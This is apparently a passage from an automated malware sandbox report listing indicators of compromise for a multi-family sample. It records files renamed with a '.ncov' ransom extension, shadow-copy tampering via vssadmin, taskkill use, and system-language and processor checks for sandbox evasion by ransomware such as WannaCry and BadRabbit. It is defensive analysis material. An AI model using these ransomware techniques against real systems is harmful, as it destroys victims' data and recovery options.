description ioc Process File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-400_contrast-white.png 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Call_Reconnected_Loud.m4a 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\System.RunTime.Serialization.Resources.dll chrome.exe File created C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui chrome.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\vk_swiftshader.dll 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-36_altform-unplated.png chrome.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\Trust Protection Lists\Sigma\Content 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\javaws.jar 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat chrome.exe File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\identity_proxy\win10\identity_helper.Sparse.Beta.msix 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\MedTile.scale-125.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo.id-3E2BF343.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Windows Media Player\it-IT\wmplayer.exe.mui CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Reflection.eftx 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\MoviesAnywhereLogoWithTextDark.scale-200.png 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt40.dll 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-48_altform-lightunplated.png chrome.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-150.png chrome.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-100.HCBlack.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptySearch.scale-150.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Office16\OUTLFLTR.DAT 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\Internet Explorer\iexplore.exe chrome.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\TipTsf.dll.mui chrome.exe File created C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_93328\javaw.exe chrome.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-36_altform-lightunplated.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.scale-100.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-125.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-256_altform-unplated_contrast-white.png CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MINSBROAMINGPROXY.DLL 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewer\ViewEnv.ddsh 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymk.ttf 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant\UIAutomationClientSideProviders.resources.dll chrome.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\import_google_contacts\googleImportError.png CoronaVirus.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libmft_plugin.dll.id-3E2BF343.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files (x86)\Windows Media Player\es-ES\WMPMediaSharing.dll.mui CoronaVirus.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\Exist.ps1 CoronaVirus.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-100.png 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\dot.cur 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\kok.pak chrome.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\System.Speech.dll 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.id-3E2BF343.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL.HXS.id-3E2BF343.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Java\jre-1.8\lib\security\cacerts 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pem 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\ui-strings.js 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\WideTile.scale-125.png chrome.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square71x71Logo.scale-100.png chrome.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\ja\Microsoft.Build.Engine.resources.dll chrome.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\as90.xsl.id-3E2BF343.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-ms.id-3E2BF343.[[email protected]].ncov CoronaVirus.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Banded Edge.eftx 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x chrome.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\oneauth.dll chrome.exe File created C:\Program Files\Java\jre-1.8\lib\ext\dnsns.jar 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Diagnostics.PerformanceCounter.dll chrome.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js chrome.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-200.png CoronaVirus.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe CoronaVirus.exe File created C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales\hu.pak 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaSansRegular.ttf 2025-04-06_56c9b50e8936c2516fb1e809d9989912_cobalt-strike_frostygoop_ghostlocker_luca-stealer_sliver_snatch.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\Boot\EFI\uk-UA\bootmgfw.efi.mui chrome.exe File created C:\Windows\Containers\WindowsDefenderApplicationGuard.wim chrome.exe File created C:\Windows\INF\intelta.inf chrome.exe File created C:\Windows\INF\usbhub\usbperfsym.h chrome.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\App_LocalResources\setUpAuthentication.aspx.de.resx chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\wizardInit.ascx.de.resx chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.ConfigCI.Commands.Resources\v4.0_10.0.0.0_fr_31bf3856ad364e35\Microsoft.ConfigCI.Commands.Resources.dll chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Dtc.PowerShell.Resources\v4.0_10.0.0.0_de_31bf3856ad364e35\Microsoft.Dtc.PowerShell.Resources.dll chrome.exe File created C:\Windows\Microsoft.NET\Framework\v2.0.50727\1036\cscompui.dll chrome.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\de\System.Management.Instrumentation.resources.dll chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\App_LocalResources\home0.aspx.fr.resx chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ConfigCI.Commands\v4.0_10.0.0.0__31bf3856ad364e35\AllowMicrosoft.xml chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Transactions.Bridge.resources\v4.0_4.0.0.0_ja_b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.resources.dll chrome.exe File created C:\Windows\PolicyDefinitions\fr-FR\SettingSync.adml chrome.exe File created C:\Windows\PolicyDefinitions\ja-JP\pca.adml chrome.exe File created C:\Windows\Speech_OneCore\Engines\TTS\it-IT\ItIT.Name.dat chrome.exe File created C:\Windows\Cursors\up_m.cur chrome.exe File created C:\Windows\Fonts\serifft.fon chrome.exe File created C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_difr.x3d chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\App_LocalResources\addUser.aspx.de.resx chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Linq.dll chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SecurityAuditPoliciesSnapIn\v4.0_10.0.0.0__31bf3856ad364e35\SecurityAuditPoliciesSnapIn.dll chrome.exe File created C:\Windows\PolicyDefinitions\es-ES\Handwriting.adml chrome.exe File created C:\Windows\Prefetch\PfPre_0316ab32.mkd chrome.exe File created C:\Windows\INF\uaspstor.inf chrome.exe File created C:\Windows\INF\virtualdisplayadapter.inf chrome.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_CENTRAL_mfc100jpn_x86 chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fr\Microsoft.Build.Tasks.v4.0.resources.dll chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\it\System.Runtime.Remoting.resources.dll chrome.exe File created C:\Windows\PolicyDefinitions\fr-FR\GroupPolicy.adml chrome.exe File created C:\Windows\PolicyDefinitions\it-IT\DmaGuard.adml chrome.exe File created C:\Windows\Fonts\tahomabd.ttf chrome.exe File created C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_CENTRAL_mfc100u_x64 chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\es\aspnet_regbrowsers.resources.dll chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation.resources\v4.0_4.0.0.0_fr_31bf3856ad364e35\System.Activities.Presentation.resources.dll chrome.exe File created C:\Windows\PolicyDefinitions\fr-FR\wlansvc.adml chrome.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk chrome.exe File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\PDXFile_8.ico chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\es-ES\ServiceModelInstallRC.dll.mui chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Security\Users\App_LocalResources\editUser.aspx.resx chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.DurableInstancing.resources\v4.0_4.0.0.0_fr_31bf3856ad364e35\System.Runtime.DurableInstancing.resources.dll chrome.exe File created C:\Windows\Speech_OneCore\Engines\TTS\fr-FR\NUSData\M1036Paul.keyboard.NU2 chrome.exe File created C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\comdll.x.manifest chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\App_LocalResources\AppConfigHome.aspx.es.resx chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\fr-FR\PresentationHostDLL.dll.mui chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\wizardPermission.ascx.resx chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Dtc.PowerShell.Resources\v4.0_10.0.0.0_fr_31bf3856ad364e35\Microsoft.Dtc.PowerShell.Resources.dll chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Policy.1.0.Microsoft.PowerShell.Security\v4.0_1.0.0.0__31bf3856ad364e35\Policy.1.0.Microsoft.Powershell.Security.config chrome.exe File created C:\Windows\PolicyDefinitions\ja-JP\AppPrivacy.adml chrome.exe File created C:\Windows\Speech_OneCore\Engines\TTS\ja-JP\M1041Sayaka.BR2 chrome.exe File created C:\Windows\Boot\Resources\it-IT\bootres.dll.mui chrome.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\App_LocalResources\setUpAuthentication.aspx.ja.resx chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\it\System.Drawing.Design.Resources.dll chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\es\WindowsFormsIntegration.resources.dll chrome.exe File created C:\Windows\PolicyDefinitions\de-DE\MSAPolicy.adml chrome.exe File created C:\Windows\Speech_OneCore\Engines\SR\en-US-N\l1033.phn chrome.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\fr\SqlWorkflowInstanceStoreLogic.sql chrome.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\cscompui.dll chrome.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.resources\v4.0_4.0.0.0_de_b77a5c561934e089\System.Data.resources.dll chrome.exe File created C:\Windows\PolicyDefinitions\es-ES\PerformancePerftrack.adml chrome.exe File created C:\Windows\Speech\Engines\SR\es-ES\l3082.ini chrome.exe File created C:\Windows\Fonts\85s1257.fon chrome.exe File created C:\Windows\Fonts\georgiai.ttf chrome.exe File created C:\Windows\INF\net1ic64.inf chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 3476 5800 WerFault.exe 205 4896 1516 WerFault.exe 200 2536 1988 WerFault.exe 271 4420 5844 WerFault.exe 236 3052 5276 WerFault.exe 286 2316 856 WerFault.exe 249 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $uckyLocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language !WannaDecryptor!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ev3n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language satan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BadRabbit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WannaCry (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language system.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BadRabbit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WannaCry (4).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language !WannaDecryptor!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $uckyLocker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BadRabbit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CoronaVirus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ev3n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language !WannaDecryptor!.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language satan.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2392 vssadmin.exe 2236 vssadmin.exe 3604 vssadmin.exe -
Kills process with taskkill 4 IoCs
pid Process 2700 taskkill.exe 1012 taskkill.exe 4388 taskkill.exe 452 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c00f0c3312a7db01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80a8173312a7db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created 